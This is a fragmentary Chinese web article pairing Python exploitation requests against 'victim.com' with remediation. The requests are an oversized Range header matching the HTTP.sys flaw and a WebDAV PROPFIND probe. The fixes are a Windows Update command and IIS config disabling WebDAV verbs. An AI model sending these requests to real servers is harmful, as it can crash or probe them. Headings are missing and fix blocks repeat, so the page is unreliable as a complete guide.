74人参与 • 2024-08-03 • 脚本攻防
range
头字段中的特制值。利用示例:
import requests
headers = {
'range': 'bytes=0-18446744073709551615'
}
response = requests.get('http://victim.com', headers=headers)
print(response.status_code)
修复方法:
# windows 更新命令
wuauclt /detectnow /updatenow
利用示例:
import requests
payload = "<?xml version=\"1.0\"?><propfind xmlns=\"dav:\"><prop><propname/></prop></propfind>"
headers = {
'content-length': str(len(payload)),
'content-type': 'text/xml'
}
response = requests.request('propfind', 'http://victim.com', headers=headers, data=payload)
print(response.status_code)
修复方法:
# 禁用 webdav 方法
<configuration>
<system.webserver>
<security>
<requestfiltering>
<verbs>
<add verb="propfind" allowed="false" />
<add verb="proppatch" allowed="false" />
<add verb="mkcol" allowed="false" />
<add verb="copy" allowed="false" />
<add verb="move" allowed="false" />
<add verb="lock" allowed="false" />
<add verb="unlock" allowed="false" />
</verbs>
</requestfiltering>
</security>
</system.webserver>
</configuration>
修复方法:
# windows 更新命令
wuauclt /detectnow /updatenow
修复方法:
# windows 更新命令
wuauclt /detectnow /updatenow
除了针对特定漏洞的修补,以下是一些综合的防御措施:
您想发表意见!!点此发布评论
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论